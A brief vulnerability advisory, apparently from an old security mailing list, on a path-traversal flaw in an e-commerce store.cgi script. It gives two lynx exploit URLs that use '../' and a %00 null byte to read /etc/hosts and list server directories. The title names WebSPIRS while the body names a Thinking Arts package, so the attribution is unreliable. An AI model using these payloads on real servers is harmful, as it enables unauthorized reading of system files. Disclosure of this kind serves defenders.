Name : WebSPIRS CGI script "show files" Vulnerability. About : Thinking Arts LTD E-Commerce package comes with a webstore frontend called store.cgi which allows people to basically order products on their website over a SQL database. Problem: Adding the string "/../" to an URL allows an attacker to view any file on the server, and also list directories within the server Exploit: lynx http://www.VULNERABLE.com/cgi-bin/store.cgi?StartID=../etc/hosts%00.html lynx http://www.VULNERABLE.com/cgi-bin/store.cgi?StartID=../etc/%00.html by: slipy (slipy@b10z.net)